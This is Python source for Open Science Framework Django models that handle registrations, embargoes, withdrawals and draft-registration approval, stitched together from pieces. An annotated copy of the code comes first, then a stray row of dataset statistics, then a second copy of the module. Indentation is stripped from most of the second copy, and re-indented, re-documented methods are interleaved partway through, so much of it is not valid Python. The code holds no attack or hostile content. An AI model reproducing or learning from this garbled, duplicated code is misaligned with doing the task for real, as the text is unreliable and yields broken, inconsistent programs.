            return self
        return self.root

    # NOTE(review): unlike the neighboring accessors this is a plain method,
    # not a @property -- possibly a missing decorator; confirm callers
    # before changing.
    def date_withdrawn(self):
        return getattr(self.root.retraction, 'date_retracted', None)

    @property
    def withdrawal_justification(self):
        return getattr(self.root.retraction, 'justification', None)

    def _initiate_embargo(self, user, end_date, for_existing_registration=False,
                          notify_initiator_on_complete=False):
        """Create and attach an Embargo, adding every admin in the tree as
        an authorizer.

        :param user: User who initiated the embargo
        :param end_date: Date when the registration should be made public
        """
        # Normalize to midnight while keeping the caller's tzinfo.
        end_date_midnight = datetime.datetime.combine(
            end_date,
            datetime.datetime.min.time()
        ).replace(tzinfo=end_date.tzinfo)
        self.embargo = Embargo.objects.create(
            initiated_by=user,
            end_date=end_date_midnight,
            for_existing_registration=for_existing_registration,
            notify_initiator_on_complete=notify_initiator_on_complete
        )
        self.save()  # Set foreign field reference Node.embargo
        admins = self.get_admin_contributors_recursive(unique_users=True)
        for (admin, node) in admins:
            self.embargo.add_authorizer(admin, node)
        self.embargo.save()  # Save embargo's approval_state
        return self.embargo

    def embargo_registration(self, user, end_date, for_existing_registration=False,
                             notify_initiator_on_complete=False):
        """Enter registration into an embargo period at end of which, it will
        be made public
        :param user: User initiating the embargo
        :param end_date: Date when the registration should be made public
        :raises: NodeStateError if Node is not a registration
        :raises: PermissionsError if user is not an admin for the Node
        :raises: ValidationError if end_date is not within time constraints
        """
        if not self.is_admin_contributor(user):
            raise PermissionsError('Only admins may embargo a registration')
        if not self._is_embargo_date_valid(end_date):
            # An invalid date at/over the minimum must be past the maximum
            # window; otherwise it is too soon.
            if (end_date - timezone.now()) >= settings.EMBARGO_END_DATE_MIN:
                raise ValidationError('Registrations can only be embargoed for up to four years.')
            raise ValidationError('Embargo end date must be at least three days in the future.')
        embargo = self._initiate_embargo(user, end_date,
                                         for_existing_registration=for_existing_registration,
                                         notify_initiator_on_complete=notify_initiator_on_complete)
        self.registered_from.add_log(
            action=NodeLog.EMBARGO_INITIATED,
            params={
                'node': self.registered_from._id,
                'registration': self._id,
                'embargo_id': embargo._id,
            },
            auth=Auth(user),
            save=True,
        )
        # Embargoed registrations must stay private until the embargo lifts.
        if self.is_public:
            self.set_privacy('private', Auth(user))

    def request_embargo_termination(self, auth):
        """Initiates an EmbargoTerminationApproval to lift this Embargoed Registration's
        embargo early.

        :raises: NodeStateError when not embargoed or not called on the root
        """
        if not self.is_embargoed:
            raise NodeStateError('This node is not under active embargo')
        if not self.root == self:
            raise NodeStateError('Only the root of an embargoed registration can request termination')
        approval = EmbargoTerminationApproval(
            initiated_by=auth.user,
            embargoed_registration=self,
        )
        admins = [admin for admin in self.root.get_admin_contributors_recursive(unique_users=True)]
        for (admin, node) in admins:
            approval.add_authorizer(admin, node=node)
        approval.save()
        approval.ask(admins)
        self.embargo_termination_approval = approval
        self.save()
        return approval

    def terminate_embargo(self, auth):
        """Handles the actual early termination of an Embargoed registration.
        Adds a log to the registered_from Node.
        """
        # NOTE(review): `auth` is accepted but unused in this body.
        if not self.is_embargoed:
            raise NodeStateError('This node is not under active embargo')
        self.registered_from.add_log(
            action=NodeLog.EMBARGO_TERMINATED,
            params={
                'project': self._id,
                'node': self.registered_from._id,
                'registration': self._id,
            },
            auth=None,
            save=True
        )
        self.embargo.mark_as_completed()
        # Lifting the embargo makes the whole registration tree public.
        for node in self.node_and_primary_descendants():
            node.set_privacy(
                self.PUBLIC,
                auth=None,
                log=False,
                save=True
            )
        return True

    def _initiate_retraction(self, user, justification=None):
        """Initiates the retraction process for a registration
        :param user: User who initiated the retraction
        :param justification: Justification, if given, for retraction
        """
        self.retraction = Retraction.objects.create(
            initiated_by=user,
            justification=justification or None,  # make empty strings None
            state=Retraction.UNAPPROVED
        )
        self.save()
        admins = self.get_admin_contributors_recursive(unique_users=True)
        for (admin, node) in admins:
            self.retraction.add_authorizer(admin, node)
        self.retraction.save()  # Save retraction approval state
        return self.retraction

    def retract_registration(self, user, justification=None, save=True):
        """Retract public registration. Instantiate new Retraction object
        and associate it with the respective registration.

        :raises: NodeStateError when not public/embargoed or not the root
        """
        if not self.is_public and not (self.embargo_end_date or self.is_pending_embargo):
            raise NodeStateError('Only public or embargoed registrations may be withdrawn.')
        if self.root_id != self.id:
            raise NodeStateError('Withdrawal of non-parent registrations is not permitted.')
        retraction = self._initiate_retraction(user, justification)
        self.registered_from.add_log(
            action=NodeLog.RETRACTION_INITIATED,
            params={
                'node': self.registered_from._id,
                'registration': self._id,
                'retraction_id': retraction._id,
            },
            auth=Auth(user),
        )
        self.retraction = retraction
        if save:
            self.save()
        return retraction

    def copy_unclaimed_records(self):
        """Copies unclaimed_records to unregistered contributors from the registered_from node"""
        registered_from_id = self.registered_from._id
        for contributor in self.contributors.filter(is_registered=False):
            record = contributor.unclaimed_records.get(registered_from_id)
            if record:
                contributor.unclaimed_records[self._id] = record
                contributor.save()

    def delete_registration_tree(self, save=False):
        """Soft-delete this registration and, recursively, its primary
        descendants; detaches pending draft approvals so drafts can be
        resubmitted."""
        logger.debug('Marking registration {} as deleted'.format(self._id))
        self.is_deleted = True
        for draft_registration in DraftRegistration.objects.filter(registered_node=self):
            # Allow draft registration to be submitted
            if draft_registration.approval:
                draft_registration.approval = None
                draft_registration.save()
        if not getattr(self.embargo, 'for_existing_registration', False):
            self.registered_from = None
        if save:
            self.save()
        self.update_search()
        for child in self.nodes_primary:
            child.delete_registration_tree(save=save)

    def update_files_count(self):
        # Updates registration files_count at archival success or
        # at the end of forced (manual) archive for restarted (stuck or failed) registrations.
        # auto_now is toggled off so this bookkeeping save does not bump
        # the `modified` timestamp.
        field = AbstractNode._meta.get_field('modified')
        field.auto_now = False
        self.files_count = self.files.filter(deleted_on__isnull=True).count()
        self.save()
        field.auto_now = True

    # Tag mutation is blocked on withdrawn registrations; each override
    # defers to AbstractNode when no retraction is attached.
    def add_tag(self, tag, auth=None, save=True, log=True, system=False):
        if self.retraction is None:
            super(Registration, self).add_tag(tag, auth, save, log, system)
        else:
            raise NodeStateError('Cannot add tags to withdrawn registrations.')

    def add_tags(self, tags, auth=None, save=True, log=True, system=False):
        if self.retraction is None:
            super(Registration, self).add_tags(tags, auth, save, log, system)
        else:
            raise NodeStateError('Cannot add tags to withdrawn registrations.')

    def remove_tag(self, tag, auth, save=True):
        if self.retraction is None:
            super(Registration, self).remove_tag(tag, auth, save)
        else:
            raise NodeStateError('Cannot remove tags of withdrawn registrations.')

    def remove_tags(self, tags, auth, save=True):
        if self.retraction is None:
            super(Registration, self).remove_tags(tags, auth, save)
        else:
            raise NodeStateError('Cannot remove tags of withdrawn registrations.')

    class Meta:
        # custom permissions for use in the OSF Admin App
        permissions = (
            ('view_registration', 'Can view registration details'),
        )
class DraftRegistrationLog(ObjectIDMixin, BaseModel):
    """Simple log recording status changes for DraftRegistrations.

    field - _id - primary key
    field - date - date the action took place
    field - action - simple action string describing what happened
    field - user - user who performed the action
    """
    date = NonNaiveDateTimeField(default=timezone.now)
    action = models.CharField(max_length=255)
    draft = models.ForeignKey('DraftRegistration', related_name='logs',
                              null=True, blank=True, on_delete=models.CASCADE)
    user = models.ForeignKey('OSFUser', null=True, on_delete=models.CASCADE)

    # Recognized action values.
    SUBMITTED = 'submitted'
    REGISTERED = 'registered'
    APPROVED = 'approved'
    REJECTED = 'rejected'

    def __repr__(self):
        return ('<DraftRegistrationLog({self.action!r}, date={self.date!r}), '
                'user={self.user!r} '
                'with id {self._id!r}>').format(self=self)
class DraftRegistration(ObjectIDMixin, BaseModel):
    """An in-progress registration: schema answers collected on a Node
    before it is turned into a frozen Registration, with an optional
    pre-registration approval workflow."""

    URL_TEMPLATE = settings.DOMAIN + 'project/{node_id}/drafts/{draft_id}'

    datetime_initiated = NonNaiveDateTimeField(auto_now_add=True)
    datetime_updated = NonNaiveDateTimeField(auto_now=True)
    deleted = NonNaiveDateTimeField(null=True, blank=True)

    # Original Node a draft registration is associated with
    branched_from = models.ForeignKey('Node', related_name='registered_draft',
                                      null=True, on_delete=models.CASCADE)

    initiator = models.ForeignKey('OSFUser', null=True, on_delete=models.CASCADE)
    provider = models.ForeignKey('RegistrationProvider', related_name='draft_registrations', null=True)

    # Dictionary field mapping question id to a question's comments and answer
    # {
    #   <qid>: {
    #     'comments': [{
    #       'user': {
    #         'id': <uid>,
    #         'name': <name>
    #       },
    #       value: <value>,
    #       lastModified: <datetime>
    #     }],
    #     'value': <value>
    #   }
    # }
    registration_metadata = DateTimeAwareJSONField(default=dict, blank=True)
    registration_schema = models.ForeignKey('RegistrationSchema', null=True, on_delete=models.CASCADE)
    # Set once `register` succeeds; links the draft to its Registration.
    registered_node = models.ForeignKey('Registration', null=True, blank=True,
                                        related_name='draft_registration', on_delete=models.CASCADE)

    approval = models.ForeignKey('DraftRegistrationApproval', null=True, blank=True, on_delete=models.CASCADE)

    # Dictionary field mapping extra fields defined in the RegistrationSchema.schema to their
    # values. Defaults should be provided in the schema (e.g. 'paymentSent': false),
    # and these values are added to the DraftRegistration
    # TODO: Use "FIELD_ALIASES"?
    _metaschema_flags = DateTimeAwareJSONField(default=dict, blank=True)

    notes = models.TextField(blank=True)

    def __repr__(self):
        return ('<DraftRegistration(branched_from={self.branched_from!r}) '
                'with id {self._id!r}>').format(self=self)

    # lazily set flags
    @property
    def flags(self):
        """Schema-declared flags, lazily seeded from the schema's defaults
        the first time they are read (saves the draft when seeding occurs)."""
        if not self._metaschema_flags:
            self._metaschema_flags = {}
        meta_schema = self.registration_schema
        if meta_schema:
            schema = meta_schema.schema
            flags = schema.get('flags', {})
            dirty = False
            for flag, value in flags.items():
                # Only fill in flags not already set on this draft.
                if flag not in self._metaschema_flags:
                    self._metaschema_flags[flag] = value
                    dirty = True
            if dirty:
                self.save()
        return self._metaschema_flags

    @flags.setter
    def flags(self, flags):
        # Merges into the stored flags; does not save.
        self._metaschema_flags.update(flags)

    @property
    def url(self):
        """Relative web URL of this draft on its branched-from node."""
        return self.URL_TEMPLATE.format(
            node_id=self.branched_from._id,
            draft_id=self._id
        )

    @property
    def absolute_url(self):
        return urlparse.urljoin(settings.DOMAIN, self.url)

    @property
    def absolute_api_v2_url(self):
        node = self.branched_from
        path = '/nodes/{}/draft_registrations/{}/'.format(node._id, self._id)
        return api_v2_url(path)

    # used by django and DRF
    def get_absolute_url(self):
        return self.absolute_api_v2_url

    @property
    def requires_approval(self):
        return self.registration_schema.requires_approval

    @property
    def is_pending_review(self):
        return self.approval.is_pending_approval if (self.requires_approval and self.approval) else False

    @property
    def is_approved(self):
        # With no approval object, having a registered node implies approval.
        if self.requires_approval:
            if not self.approval:
                return bool(self.registered_node)
            else:
                return self.approval.is_approved
        else:
            return False

    @property
    def is_rejected(self):
        if self.requires_approval:
            if not self.approval:
                return False
            else:
                return self.approval.is_rejected
        else:
            return False

    @property
    def status_logs(self):
        """ List of logs associated with this node"""
        return self.logs.all().order_by('date')

    @classmethod
    def create_from_node(cls, node, user, schema, data=None, provider=None):
        """Create and save a draft for *node*, defaulting to the 'osf'
        provider when none is given."""
        if not provider:
            provider = RegistrationProvider.load('osf')
        draft = cls(
            initiator=user,
            branched_from=node,
            registration_schema=schema,
            registration_metadata=data or {},
            provider=provider,
        )
        draft.save()
        return draft

    def update_metadata(self, metadata):
        """Merge *metadata* into registration_metadata and return the list
        of question ids whose values changed.  Comment merging is skipped
        on approved drafts.  Does not save."""
        changes = []
        # Prevent comments on approved drafts
        if not self.is_approved:
            for question_id, value in metadata.items():
                old_value = self.registration_metadata.get(question_id)
                if old_value:
                    # Merge comments keyed by creation time; new wins.
                    old_comments = {
                        comment['created']: comment
                        for comment in old_value.get('comments', [])
                    }
                    new_comments = {
                        comment['created']: comment
                        for comment in value.get('comments', [])
                    }
                    old_comments.update(new_comments)
                    metadata[question_id]['comments'] = sorted(
                        old_comments.values(),
                        key=lambda c: c['created']
                    )
                    if old_value.get('value') != value.get('value'):
                        changes.append(question_id)
                else:
                    changes.append(question_id)
        self.registration_metadata.update(metadata)
        return changes

    def submit_for_review(self, initiated_by, meta, save=False):
        """Attach a DraftRegistrationApproval and log the submission."""
        approval = DraftRegistrationApproval(
            meta=meta
        )
        approval.save()
        self.approval = approval
        self.add_status_log(initiated_by, DraftRegistrationLog.SUBMITTED)
        if save:
            self.save()

    def register(self, auth, save=False, child_ids=None):
        """Turn this draft into a Registration of the branched-from node
        and return the new registration."""
        node = self.branched_from
        # Create the registration
        register = node.register_node(
            schema=self.registration_schema,
            auth=auth,
            data=self.registration_metadata,
            child_ids=child_ids,
            provider=self.provider
        )
        self.registered_node = register
        self.add_status_log(auth.user, DraftRegistrationLog.REGISTERED)
        if save:
            self.save()
        return register

    def approve(self, user):
        self.approval.approve(user)
        self.refresh_from_db()
        self.add_status_log(user, DraftRegistrationLog.APPROVED)
        self.approval.save()

    def reject(self, user):
        self.approval.reject(user)
        self.add_status_log(user, DraftRegistrationLog.REJECTED)
        self.approval.save()

    def add_status_log(self, user, action):
        # Persist a DraftRegistrationLog entry for this draft.
        log = DraftRegistrationLog(action=action, user=user, draft=self)
        log.save()

    def validate_metadata(self, *args, **kwargs):
        """
        Validates draft's metadata
        """
        return self.registration_schema.validate_metadata(*args, **kwargs)
| 37.633484 | 164 | 0.624945 | import logging
import datetime
import urlparse
from django.core.exceptions import ValidationError
from django.db import models
from django.utils import timezone
from framework.auth import Auth
from framework.exceptions import PermissionsError
from osf.utils.fields import NonNaiveDateTimeField
from osf.exceptions import NodeStateError
from website.util import api_v2_url
from website import settings
from website.archiver import ARCHIVER_INITIATED
from osf.models import (
OSFUser, RegistrationSchema,
Retraction, Embargo, DraftRegistrationApproval,
EmbargoTerminationApproval,
)
from osf.models.archive import ArchiveJob
from osf.models.base import BaseModel, ObjectIDMixin
from osf.models.node import AbstractNode
from osf.models.nodelog import NodeLog
from osf.models.provider import RegistrationProvider
from osf.utils.datetime_aware_jsonfield import DateTimeAwareJSONField
logger = logging.getLogger(__name__)
class Registration(AbstractNode):
WRITABLE_WHITELIST = [
'article_doi',
'description',
'is_public',
'node_license',
'category',
]
provider = models.ForeignKey('RegistrationProvider', related_name='registrations', null=True)
registered_date = NonNaiveDateTimeField(db_index=True, null=True, blank=True)
registered_user = models.ForeignKey(OSFUser,
related_name='related_to',
on_delete=models.SET_NULL,
null=True, blank=True)
registered_schema = models.ManyToManyField(RegistrationSchema)
registered_meta = DateTimeAwareJSONField(default=dict, blank=True)
registered_from = models.ForeignKey('self',
related_name='registrations',
on_delete=models.SET_NULL,
null=True, blank=True)
registration_approval = models.ForeignKey('RegistrationApproval',
related_name='registrations',
null=True, blank=True,
on_delete=models.SET_NULL)
retraction = models.ForeignKey('Retraction',
related_name='registrations',
null=True, blank=True,
on_delete=models.SET_NULL)
embargo = models.ForeignKey('Embargo',
related_name='registrations',
null=True, blank=True,
on_delete=models.SET_NULL)
embargo_termination_approval = models.ForeignKey('EmbargoTerminationApproval',
related_name='registrations',
null=True, blank=True,
on_delete=models.SET_NULL)
files_count = models.PositiveIntegerField(blank=True, null=True)
@staticmethod
def find_failed_registrations():
expired_if_before = timezone.now() - settings.ARCHIVE_TIMEOUT_TIMEDELTA
node_id_list = ArchiveJob.objects.filter(sent=False, datetime_initiated__lt=expired_if_before, status=ARCHIVER_INITIATED).values_list('dst_node', flat=True)
root_nodes_id = AbstractNode.objects.filter(id__in=node_id_list).values_list('root', flat=True).distinct()
stuck_regs = AbstractNode.objects.filter(id__in=root_nodes_id, is_deleted=False)
return stuck_regs
@property
def registered_schema_id(self):
if self.registered_schema.exists():
return self.registered_schema.first()._id
return None
@property
def is_registration(self):
return True
@property
def is_stuck_registration(self):
return self in self.find_failed_registrations()
@property
def is_collection(self):
return False
@property
def archive_job(self):
return self.archive_jobs.first() if self.archive_jobs.count() else None
@property
def sanction(self):
root = self._dirty_root
sanction = (
root.embargo_termination_approval or
root.retraction or
root.embargo or
root.registration_approval
)
if sanction:
return sanction
else:
return None
@property
def is_registration_approved(self):
root = self._dirty_root
if root.registration_approval is None:
return False
return root.registration_approval.is_approved
@property
def is_pending_embargo(self):
root = self._dirty_root
if root.embargo is None:
return False
return root.embargo.is_pending_approval
@property
def is_pending_embargo_for_existing_registration(self):
root = self._dirty_root
if root.embargo is None:
return False
return root.embargo.pending_registration
@property
def is_retracted(self):
root = self._dirty_root
if root.retraction is None:
return False
return root.retraction.is_approved
@property
def is_pending_registration(self):
root = self._dirty_root
if root.registration_approval is None:
return False
return root.registration_approval.is_pending_approval
@property
def is_pending_retraction(self):
root = self._dirty_root
if root.retraction is None:
return False
return root.retraction.is_pending_approval
@property
def is_pending_embargo_termination(self):
root = self._dirty_root
if root.embargo_termination_approval is None:
return False
return root.embargo_termination_approval.is_pending_approval
@property
def is_embargoed(self):
root = self._dirty_root
if root.is_public or root.embargo is None:
return False
return root.embargo.is_approved
@property
def embargo_end_date(self):
root = self._dirty_root
if root.embargo is None:
return False
return root.embargo.embargo_end_date
@property
def archiving(self):
job = self.archive_job
return job and not job.done and not job.archive_tree_finished()
@property
def _dirty_root(self):
if self.id == self.root_id:
return self
return self.root
def date_withdrawn(self):
return getattr(self.root.retraction, 'date_retracted', None)
@property
def withdrawal_justification(self):
return getattr(self.root.retraction, 'justification', None)
def _initiate_embargo(self, user, end_date, for_existing_registration=False,
notify_initiator_on_complete=False):
end_date_midnight = datetime.datetime.combine(
end_date,
datetime.datetime.min.time()
).replace(tzinfo=end_date.tzinfo)
self.embargo = Embargo.objects.create(
initiated_by=user,
end_date=end_date_midnight,
for_existing_registration=for_existing_registration,
notify_initiator_on_complete=notify_initiator_on_complete
)
self.save()
admins = self.get_admin_contributors_recursive(unique_users=True)
for (admin, node) in admins:
self.embargo.add_authorizer(admin, node)
self.embargo.save()
return self.embargo
def embargo_registration(self, user, end_date, for_existing_registration=False,
notify_initiator_on_complete=False):
if not self.is_admin_contributor(user):
raise PermissionsError('Only admins may embargo a registration')
if not self._is_embargo_date_valid(end_date):
if (end_date - timezone.now()) >= settings.EMBARGO_END_DATE_MIN:
raise ValidationError('Registrations can only be embargoed for up to four years.')
raise ValidationError('Embargo end date must be at least three days in the future.')
embargo = self._initiate_embargo(user, end_date,
for_existing_registration=for_existing_registration,
notify_initiator_on_complete=notify_initiator_on_complete)
self.registered_from.add_log(
action=NodeLog.EMBARGO_INITIATED,
params={
'node': self.registered_from._id,
'registration': self._id,
'embargo_id': embargo._id,
},
auth=Auth(user),
save=True,
)
if self.is_public:
self.set_privacy('private', Auth(user))
def request_embargo_termination(self, auth):
if not self.is_embargoed:
raise NodeStateError('This node is not under active embargo')
if not self.root == self:
raise NodeStateError('Only the root of an embargoed registration can request termination')
approval = EmbargoTerminationApproval(
initiated_by=auth.user,
embargoed_registration=self,
)
admins = [admin for admin in self.root.get_admin_contributors_recursive(unique_users=True)]
for (admin, node) in admins:
approval.add_authorizer(admin, node=node)
approval.save()
approval.ask(admins)
self.embargo_termination_approval = approval
self.save()
return approval
def terminate_embargo(self, auth):
if not self.is_embargoed:
raise NodeStateError('This node is not under active embargo')
self.registered_from.add_log(
action=NodeLog.EMBARGO_TERMINATED,
params={
'project': self._id,
'node': self.registered_from._id,
'registration': self._id,
},
auth=None,
save=True
)
self.embargo.mark_as_completed()
for node in self.node_and_primary_descendants():
node.set_privacy(
self.PUBLIC,
auth=None,
log=False,
save=True
)
return True
def _initiate_retraction(self, user, justification=None):
self.retraction = Retraction.objects.create(
initiated_by=user,
justification=justification or None, # make empty strings None
state=Retraction.UNAPPROVED
)
self.save()
admins = self.get_admin_contributors_recursive(unique_users=True)
for (admin, node) in admins:
self.retraction.add_authorizer(admin, node)
self.retraction.save() # Save retraction approval state
return self.retraction
    def retract_registration(self, user, justification=None, save=True):
        """Begin withdrawal ("retraction") of this registration.

        Only public or embargoed root registrations may be withdrawn.

        :param user: the user initiating the withdrawal.
        :param justification: optional reason for the withdrawal.
        :param save: if True, persist this registration after attaching
            the new retraction.
        :return: the new Retraction sanction.
        :raises NodeStateError: if neither public nor embargoed, or if this
            registration is not the root of its tree.
        """
        if not self.is_public and not (self.embargo_end_date or self.is_pending_embargo):
            raise NodeStateError('Only public or embargoed registrations may be withdrawn.')
        if self.root_id != self.id:
            raise NodeStateError('Withdrawal of non-parent registrations is not permitted.')
        retraction = self._initiate_retraction(user, justification)
        # Record the initiation on the source node, attributed to the user.
        self.registered_from.add_log(
            action=NodeLog.RETRACTION_INITIATED,
            params={
                'node': self.registered_from._id,
                'registration': self._id,
                'retraction_id': retraction._id,
            },
            auth=Auth(user),
        )
        self.retraction = retraction
        if save:
            self.save()
        return retraction
def copy_unclaimed_records(self):
registered_from_id = self.registered_from._id
for contributor in self.contributors.filter(is_registered=False):
record = contributor.unclaimed_records.get(registered_from_id)
if record:
contributor.unclaimed_records[self._id] = record
contributor.save()
    def delete_registration_tree(self, save=False):
        """Soft-delete this registration and, recursively, every primary child.

        Clears stale approvals from drafts pointing at this registration and,
        unless the embargo was created for an existing registration, unlinks
        the source node.

        :param save: if True, persist each node as it is marked deleted.
        """
        logger.debug('Marking registration {} as deleted'.format(self._id))
        self.is_deleted = True
        for draft_registration in DraftRegistration.objects.filter(registered_node=self):
            # Allow draft registration to be submitted
            if draft_registration.approval:
                draft_registration.approval = None
                draft_registration.save()
        if not getattr(self.embargo, 'for_existing_registration', False):
            # Break the link back to the source project.
            self.registered_from = None
        if save:
            self.save()
        self.update_search()
        # Recurse so the entire registration tree is marked deleted.
        for child in self.nodes_primary:
            child.delete_registration_tree(save=save)
    def update_files_count(self):
        """Recount this registration's non-deleted files and persist the count.

        Updates registration files_count at archival success or
        at the end of forced (manual) archive for restarted (stuck or failed)
        registrations.
        """
        # Temporarily disable auto_now on the shared 'modified' field so this
        # maintenance save does not bump the modification timestamp.
        # NOTE(review): mutating the class-level field object is not
        # thread-safe -- a concurrent save could observe auto_now=False.
        field = AbstractNode._meta.get_field('modified')
        field.auto_now = False
        self.files_count = self.files.filter(deleted_on__isnull=True).count()
        self.save()
        field.auto_now = True
def add_tag(self, tag, auth=None, save=True, log=True, system=False):
if self.retraction is None:
super(Registration, self).add_tag(tag, auth, save, log, system)
else:
raise NodeStateError('Cannot add tags to withdrawn registrations.')
def add_tags(self, tags, auth=None, save=True, log=True, system=False):
if self.retraction is None:
super(Registration, self).add_tags(tags, auth, save, log, system)
else:
raise NodeStateError('Cannot add tags to withdrawn registrations.')
def remove_tag(self, tag, auth, save=True):
if self.retraction is None:
super(Registration, self).remove_tag(tag, auth, save)
else:
raise NodeStateError('Cannot remove tags of withdrawn registrations.')
def remove_tags(self, tags, auth, save=True):
if self.retraction is None:
super(Registration, self).remove_tags(tags, auth, save)
else:
raise NodeStateError('Cannot remove tags of withdrawn registrations.')
    class Meta:
        # Django model options for the Registration model.
        # custom permissions for use in the OSF Admin App
        permissions = (
            ('view_registration', 'Can view registration details'),
        )
class DraftRegistrationLog(ObjectIDMixin, BaseModel):
    """Audit-log entry recording a lifecycle event on a DraftRegistration.

    'action' holds one of the string constants declared below.
    """
    # When the logged action occurred.
    date = NonNaiveDateTimeField(default=timezone.now)
    # One of the action constants (SUBMITTED, REGISTERED, APPROVED, REJECTED).
    action = models.CharField(max_length=255)
    # Draft registration this entry belongs to.
    draft = models.ForeignKey('DraftRegistration', related_name='logs',
                              null=True, blank=True, on_delete=models.CASCADE)
    # User who performed the action.
    user = models.ForeignKey('OSFUser', null=True, on_delete=models.CASCADE)
    # Action constants.
    SUBMITTED = 'submitted'
    REGISTERED = 'registered'
    APPROVED = 'approved'
    REJECTED = 'rejected'
    def __repr__(self):
        return ('<DraftRegistrationLog({self.action!r}, date={self.date!r}), '
                'user={self.user!r} '
                'with id {self._id!r}>').format(self=self)
class DraftRegistration(ObjectIDMixin, BaseModel):
    """A work-in-progress registration: schema answers collected on a source
    node before a Registration is created from it.
    """
    # Web URL pattern for a draft, filled from the source node and draft ids.
    URL_TEMPLATE = settings.DOMAIN + 'project/{node_id}/drafts/{draft_id}'
    datetime_initiated = NonNaiveDateTimeField(auto_now_add=True)
    datetime_updated = NonNaiveDateTimeField(auto_now=True)
    # Soft-delete timestamp; None means the draft is live.
    deleted = NonNaiveDateTimeField(null=True, blank=True)
    # Original Node a draft registration is associated with
    branched_from = models.ForeignKey('Node', related_name='registered_draft',
                                      null=True, on_delete=models.CASCADE)
    initiator = models.ForeignKey('OSFUser', null=True, on_delete=models.CASCADE)
    provider = models.ForeignKey('RegistrationProvider', related_name='draft_registrations', null=True)
    # Dictionary field mapping question id to a question's comments and answer
    registration_metadata = DateTimeAwareJSONField(default=dict, blank=True)
    registration_schema = models.ForeignKey('RegistrationSchema', null=True, on_delete=models.CASCADE)
    # Set once the draft has been turned into a Registration.
    registered_node = models.ForeignKey('Registration', null=True, blank=True,
                                        related_name='draft_registration', on_delete=models.CASCADE)
    # Pre-registration approval workflow state, when the schema requires one.
    approval = models.ForeignKey('DraftRegistrationApproval', null=True, blank=True, on_delete=models.CASCADE)
    # Per-draft copy of the schema's 'flags'; lazily backfilled (see flags).
    _metaschema_flags = DateTimeAwareJSONField(default=dict, blank=True)
    notes = models.TextField(blank=True)
    def __repr__(self):
        return ('<DraftRegistration(branched_from={self.branched_from!r}) '
                'with id {self._id!r}>').format(self=self)
    @property
    def flags(self):
        """Schema flags for this draft, backfilled from the schema's defaults.

        Missing flags are copied from the schema; the draft is saved if any
        flag was added.
        """
        if not self._metaschema_flags:
            self._metaschema_flags = {}
        meta_schema = self.registration_schema
        if meta_schema:
            schema = meta_schema.schema
            flags = schema.get('flags', {})
            dirty = False
            for flag, value in flags.items():
                # Only fill in defaults; never overwrite an existing value.
                if flag not in self._metaschema_flags:
                    self._metaschema_flags[flag] = value
                    dirty = True
            if dirty:
                self.save()
        return self._metaschema_flags
    @flags.setter
    def flags(self, flags):
        # Merges into the in-memory dict only; the caller must save().
        self._metaschema_flags.update(flags)
    @property
    def url(self):
        """Relative web URL of this draft on its source node."""
        return self.URL_TEMPLATE.format(
            node_id=self.branched_from._id,
            draft_id=self._id
        )
    @property
    def absolute_url(self):
        """Fully-qualified web URL of this draft."""
        return urlparse.urljoin(settings.DOMAIN, self.url)
    @property
    def absolute_api_v2_url(self):
        """APIv2 URL of this draft, scoped under its source node."""
        node = self.branched_from
        path = '/nodes/{}/draft_registrations/{}/'.format(node._id, self._id)
        return api_v2_url(path)
    def get_absolute_url(self):
        """Return the APIv2 URL (Django convention)."""
        return self.absolute_api_v2_url
    @property
    def requires_approval(self):
        """Whether this draft's schema demands a pre-registration approval."""
        return self.registration_schema.requires_approval
    @property
    def is_pending_review(self):
        """True while an approval is required and still pending."""
        return self.approval.is_pending_approval if (self.requires_approval and self.approval) else False
    @property
    def is_approved(self):
        """Approval state; with no approval object, fall back to whether a
        registration was already created from this draft.
        """
        if self.requires_approval:
            if not self.approval:
                return bool(self.registered_node)
            else:
                return self.approval.is_approved
        else:
            return False
    @property
    def is_rejected(self):
        """True only when an approval exists and was rejected."""
        if self.requires_approval:
            if not self.approval:
                return False
            else:
                return self.approval.is_rejected
        else:
            return False
    @property
    def status_logs(self):
        """All DraftRegistrationLog entries, oldest first."""
        return self.logs.all().order_by('date')
    @classmethod
    def create_from_node(cls, node, user, schema, data=None, provider=None):
        """Create and save a draft for ``node`` with the given schema.

        :param node: source Node the draft is branched from.
        :param user: initiating user.
        :param schema: RegistrationSchema to answer.
        :param data: optional initial registration_metadata dict.
        :param provider: RegistrationProvider; defaults to the 'osf' provider.
        :return: the saved DraftRegistration.
        """
        if not provider:
            provider = RegistrationProvider.load('osf')
        draft = cls(
            initiator=user,
            branched_from=node,
            registration_schema=schema,
            registration_metadata=data or {},
            provider=provider,
        )
        draft.save()
        return draft
    def update_metadata(self, metadata):
        """Merge new answers into registration_metadata (no-op if approved).

        Comments for each question are merged by their 'created' timestamp,
        newer entries winning, and re-sorted chronologically.

        :param metadata: mapping of question id to answer payload.
        :return: list of question ids whose 'value' changed or is new.
        """
        changes = []
        # Answers are frozen once the draft has been approved.
        if not self.is_approved:
            for question_id, value in metadata.items():
                old_value = self.registration_metadata.get(question_id)
                if old_value:
                    old_comments = {
                        comment['created']: comment
                        for comment in old_value.get('comments', [])
                    }
                    new_comments = {
                        comment['created']: comment
                        for comment in value.get('comments', [])
                    }
                    old_comments.update(new_comments)
                    metadata[question_id]['comments'] = sorted(
                        old_comments.values(),
                        key=lambda c: c['created']
                    )
                    if old_value.get('value') != value.get('value'):
                        changes.append(question_id)
                else:
                    changes.append(question_id)
        self.registration_metadata.update(metadata)
        return changes
    def submit_for_review(self, initiated_by, meta, save=False):
        """Attach a new DraftRegistrationApproval and log the submission.

        :param initiated_by: submitting user (for the status log).
        :param meta: payload stored on the approval.
        :param save: if True, persist the draft afterwards.
        """
        approval = DraftRegistrationApproval(
            meta=meta
        )
        approval.save()
        self.approval = approval
        self.add_status_log(initiated_by, DraftRegistrationLog.SUBMITTED)
        if save:
            self.save()
    def register(self, auth, save=False, child_ids=None):
        """Create a Registration from the source node using this draft's data.

        :param auth: Auth of the registering user.
        :param save: if True, persist the draft after linking the registration.
        :param child_ids: optional subset of child node ids to register.
        :return: the new Registration.
        """
        node = self.branched_from
        # Create the registration
        register = node.register_node(
            schema=self.registration_schema,
            auth=auth,
            data=self.registration_metadata,
            child_ids=child_ids,
            provider=self.provider
        )
        self.registered_node = register
        self.add_status_log(auth.user, DraftRegistrationLog.REGISTERED)
        if save:
            self.save()
        return register
    def approve(self, user):
        """Record ``user``'s approval on the attached approval object."""
        self.approval.approve(user)
        # Reload so post-approval state is visible before logging.
        self.refresh_from_db()
        self.add_status_log(user, DraftRegistrationLog.APPROVED)
        self.approval.save()
    def reject(self, user):
        """Record ``user``'s rejection on the attached approval object."""
